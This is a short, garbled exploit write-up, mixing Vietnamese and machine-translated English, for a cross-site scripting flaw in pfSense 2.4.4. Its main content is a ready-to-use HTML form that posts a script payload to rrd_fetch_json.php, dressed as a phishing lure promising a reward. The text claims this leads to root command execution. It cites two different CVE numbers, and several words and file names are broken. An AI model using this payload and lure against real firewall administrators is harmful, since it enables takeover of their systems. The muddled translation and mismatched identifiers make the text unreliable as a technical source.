[CVE-2019-12949] Khai Hóa Hồi XSS trong pfSense 2.4.4
Mô tả
Trọng the version pfSense 2.4.4 kẻ tấn công possible execution bất kì lệnh nào for copyright gốc the system through lỗ hổng XSS trongding_command.php and rrd_fetch_json.php
Đỉnh cao
Bạn có thể sử dụng một trang web lừa đảo, quan trọng và thú vị.
Xem phần mềm tại chỗ https://www.cvedetails.com/cve/CVE-2019-12347/
XSS
Phần mềm hướng dẫn
Phần mềm hướng dẫn
https://[pfSense_IP_Address]/rrd_fetch_json.php
Yêu cầu POST một trong hai
<form action="https://[PFsense-domain]/rrd_fetch_json.php" method="post">
<input type="hidden" name="left" value="system-processor"><br>
<input type="hidden" name="right" value="null"><br>
<input type="hidden" name="start" value=""><br>
<input type="hidden" name="end" value=""><br>
<input type="hidden" name="resolution" value="300"><br>
<input type="hidden" name="timePeriod" value="i3i3j<script>alert(1)</script>tz9b1"><br>
<input type="hidden" name="graphtype" value="line"><br>
<input type="hidden" name="invert" value="true"><br>
<input type="hidden" name="refreshInterval" value="0">
<h1>Congratulations on receiving the reward from us</h1>
<h1>Click to receive gifts</h1>
<input type="submit" value="Submit">
</form>
Kết quả trên trang web của chúng tôi
Such if your user quản trị to lộ info quản trị web SE DE bị kẻ tấn công khai thác lỗ hổng this following which execution lệnh từ xa thực thiwith the copyright gốc the system.